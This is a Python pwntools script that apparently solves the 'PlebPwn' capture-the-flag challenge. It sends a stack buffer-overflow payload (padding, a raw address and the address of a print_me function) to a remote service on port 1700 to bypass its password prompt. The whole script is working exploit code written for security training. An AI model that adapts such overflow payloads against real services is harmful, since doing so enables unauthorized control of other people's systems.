#! /usr/bin/env python3 ## # Created for the PlebPwn challenge # By Amos Ng ## from pwn import * # Define ELF static variables e = ELF("plebpwn") print_me = e.symbols[b"print_me"] # Keep tube quiet with context.local(log_level='error'): t = remote("", 1700) # Prepare payload payload = (("A" * (64)).encode() + b"\x00\xa0\x04\x08" # Don't use encode here, bad things happen. # Use as raw byte + ("B" * 12).encode() + p32(print_me)) log.info("Trying: %s" % (repr(payload))) t.recvuntil("Please enter the password: ") t.send(payload) # Check if successful try: log.info(t.recv(timeout=3).decode()) except EOFError: pass # Keep tube quiet with context.local(log_level='error'): t.close()